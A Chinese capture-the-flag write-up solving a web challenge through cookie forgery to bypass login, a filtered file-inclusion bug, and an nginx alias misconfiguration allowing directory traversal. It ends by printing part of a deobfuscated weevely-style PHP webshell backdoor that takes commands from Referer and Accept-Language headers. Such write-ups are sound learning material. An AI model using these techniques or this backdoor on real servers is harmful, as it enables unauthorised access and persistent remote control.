攻防世界web进阶区Web_php_wrong_nginx_config

打开题目链接
出现了个登陆界面,随便试着登一下

在这里插入图片描述在这里插入图片描述

提示网站建设中,以为是sql注入,结果全是提示这玩意

看一下robots.txt

在这里插入图片描述

挨个访问一下

在这里插入图片描述hint.php给了一个文件路径,可能是文件包含方面的

但是Hack.php自动跳转到登陆界面,题目不可能给没用的,抓包看一下

在这里插入图片描述将islogin改成1,就成为登陆状态,然后放包

在这里插入图片描述

除了管理中心以外,其他的点击会跳转到登陆界面

那就看一下这个管理中心

url出现新的路径,如果admin访问正常,会please continue

在这里插入图片描述
那么file,和ext文件扩展名,会不会是文件包含漏洞

试一下,发现…/被过滤了

emmmm,测试一下

在这里插入图片描述
在这里插入图片描述
想到双写,但半天没弄出来,看下大佬的payload

在这里插入图片描述读取到 /etc/nginx/sites-enabled/site.conf 配置文件
审计代码

在这里插入图片描述

在 url访问 /web-img , 就会访问系统根目录下的 /images/

在这里插入图片描述
在这里插入图片描述
嗯,一个目录遍历漏洞

遍历目录 , 在 /var/www 下能找到 hack.php.bak

在这里插入图片描述
下载下来,发现一堆乱码

在这里插入图片描述

看下wp,也不太懂php混肴后门还是weevely 生成的 WebShell 后门 。。。

echo $f 得到
在这里插入图片描述

<?php
$kh="42f7";
$kf="e9ac";
function x($t,$k) {
   
	$c=strlen($k);
	$l=strlen($t);
	$o="";
	for ($i=0;$i<$l;) {
   
		for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
   
			$o.=$t {
   
				$i
			}
			^$k {
   
				$j
			}
			;
		}
	}
	return $o;
}
$r=$_SERVER;
$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];
if($rr&&$ra) {
   
	$u=parse_url($rr);
	parse_str($u["query"],$q);
	$q=array_values($q);
	preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m)
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值